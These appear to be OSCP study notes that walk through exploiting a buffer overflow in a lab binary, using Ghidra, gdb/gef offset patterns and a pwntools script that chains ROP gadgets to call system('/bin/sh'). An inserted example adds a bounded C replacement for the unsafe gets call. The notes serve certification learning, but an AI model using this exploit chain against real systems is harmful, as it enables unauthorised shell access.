OSCP Notes
Binary exploitation
If you can download the app from the site, you can analyze it on Kali.
Tool: Ghidra
New project > Non-Shared Project > set a project name > Tool Chest (dragon icon) > import the file.
And analyze!
  • look into functions > main and see what it's doing
local_128
gets(local_78)
puts(local_78)
  • gets and puts are vulnerable.
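The gets(local_78) call above places no limit on how much input is copied into the buffer. As an added example (not part of the original notes), here is a bounded replacement for the gets/puts echo. BUF_SZ, read_line_bounded and probe are assumed names, and 112 is an assumed buffer size.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 112 /* assumption: size of the buffer Ghidra shows as local_78 */

/* Bounded replacement for gets(): reads one line into buf (capacity cap).
 * Returns the line length, -1 if the line was too long (the rest of it is
 * discarded, buf is emptied), or -2 on EOF/error before any data. */
long read_line_bounded(FILE *in, char *buf, size_t cap) {
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return -2;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {            /* the whole line fit, drop the newline */
        buf[n] = '\0';
        return (long)n;
    }
    int c = fgetc(in);               /* buffer full or EOF: look one byte ahead */
    if (c == EOF || c == '\n')
        return (long)n;              /* line was exactly cap-1 bytes, or last line */
    while (c != '\n' && c != EOF)    /* too long: drain so it is not read as the next line */
        c = fgetc(in);
    buf[0] = '\0';
    return -1;
}

/* Constructed input: n 'A' bytes, a newline, then the line "ok".
 * Returns the result for the first line; *next gets the result for "ok". */
long probe(size_t n, long *next) {
    char buf[BUF_SZ];
    FILE *in = tmpfile();
    if (in == NULL)
        return -2;
    for (size_t i = 0; i < n; i++)
        fputc('A', in);
    fputs("\nok\n", in);
    rewind(in);
    long first = read_line_bounded(in, buf, sizeof buf);
    *next = read_line_bounded(in, buf, sizeof buf);
    fclose(in);
    return first;
}

int main(void) {
    char buf[BUF_SZ];
    puts("What do you want me to echo back?");
    if (read_line_bounded(stdin, buf, sizeof buf) >= 0)
        puts(buf);                   /* only echo input that fit in the buffer */
    return 0;
}
```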
Try to run the app
  • make it executable with chmod +x
  • gdb ./myapp
  • download gef
  • python -c 'print("A"*112)' (copy the output and paste it into the app to test the BOF)
Does it make the app crash?
pattern create 200
Run with the "r" command.
Look at the registers with "registers".
You can search for the pattern with
pattern search $rsp
Create another pattern with
python -c 'print("A"*120 + "B"*8 + "C"*8)'
to see exactly where the B's land.
From Ghidra, copy the memory address of the main function.
Create a simple exploit.py:
from pwn import *
# Set the target context before starting the process
context(os='linux', arch='amd64')
context(terminal=['tmux', 'new-window'])
# Start the app under gdb with a breakpoint on main
p = gdb.debug('./myapp', 'b main')
junk = ("A" * 112).encode()  # 112 bytes of padding
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e) # put system address
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)
# Wait for the prompt, then send the payload
p.recvuntil(b'What do you want me to echo back?')
p.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
p.interactive()
Finding the system address:
objdump -D myapp | grep -i system